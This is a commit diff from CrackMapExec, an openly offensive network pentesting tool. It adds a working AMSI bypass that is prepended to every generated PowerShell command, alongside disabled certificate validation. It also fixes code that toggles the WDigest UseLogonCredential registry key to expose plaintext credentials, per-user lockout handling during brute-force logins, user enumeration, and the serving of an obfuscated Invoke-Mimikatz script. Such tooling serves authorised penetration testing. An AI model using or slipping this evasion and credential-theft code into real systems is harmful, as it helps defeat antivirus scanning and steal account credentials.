Implemented @mattifestation's AMSI bypass and multiple bugfixes

- @mattifestation's AMSI bypass now gets called before executing
  powershell commands or scripts

- Squashed some bugs related to account bruteforcing, enumerating users
  and creating/deleting the UseLogonCredential reg key

Author: byt3bl33d3r

cme/connection.py

@@ -211,10 +211,10 @@ def login(self):
                     if not domain: domain = self.domain
                     if self.args.domain: domain = self.args.domain
 
-                    if credtype == 'hash' and not self.over_fail_limit():
+                    if credtype == 'hash' and not self.over_fail_limit(username):
                         self.hash_login(domain, username, password)
 
-                    elif credtype == 'plaintext' and not self.over_fail_limit():
+                    elif credtype == 'plaintext' and not self.over_fail_limit(username):
                         self.plaintext_login(domain, username, password)
 
                 except IndexError:

cme/credentials/wdigest.py

@@ -22,7 +22,7 @@ def enable(self):
             ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
             keyHandle = ans['phkResult']
 
-            rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, '\x01\x00')
+            rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, 1)
 
             rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
 
@@ -46,15 +46,26 @@ def disable(self):
             ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
             keyHandle = ans['phkResult']
 
-            rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
+            try:
+                rrp.hBaseRegDeleteValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
+            except:
+                self.logger.success('UseLogonCredential registry key not present')
+
+                try:
+                    remoteOps.finish()
+                except:
+                    pass
+
+                return
 
             try:
                 #Check to make sure the reg key is actually deleted
                 rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')
             except DCERPCException:
                 self.logger.success('UseLogonCredential registry key deleted successfully')
+                
+                try:
+                    remoteOps.finish()
+                except:
+                    pass
 
-        try:
-            remoteOps.finish()
-        except:
-            pass

cme/enum/users.py

@@ -60,7 +60,7 @@ def enum(self):
         rpctransport = transport.DCERPCTransportFactory(stringbinding)
         rpctransport.set_dport(self.__port)
 
-        if hasattr(rpctransport, setRemoteHost):
+        if hasattr(rpctransport, 'setRemoteHost'):
             rpctransport.setRemoteHost(self.__addr)
         if hasattr(rpctransport, 'set_credentials'):
             # This method exists only for selected protocol sequences.

cme/helpers.py

@@ -3,6 +3,7 @@
 import re
 import cme
 import os
+import logging
 from base64 import b64encode
 from termcolor import colored
 
@@ -43,7 +44,15 @@ def obfs_ps_script(script, function_name=None):
     return strippedCode
 
 def create_ps_command(ps_command, force_ps32=False):
-    ps_command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + ps_command
+    ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};
+try{{ 
+[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
+}}catch{{}}
+{}
+""".format(ps_command)
+
+    logging.debug('Unincoded command:\n' + ps_command)
+
     if force_ps32:
         command = """$command = '{}'
 if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') 

cme/modules/mimikatz.py

@@ -55,7 +55,7 @@ def on_request(self, context, request):
             request.send_response(200)
             request.end_headers()
 
-            with open(get_ps_script('PowerSploit/Exfiltration/Invoke-Mimikatz.ps1'), 'r') as ps_script:
+            with open(get_ps_script('Invoke-Mimikatz.ps1'), 'r') as ps_script:
                 ps_script = obfs_ps_script(ps_script.read(), self.obfs_name)
                 request.wfile.write(ps_script)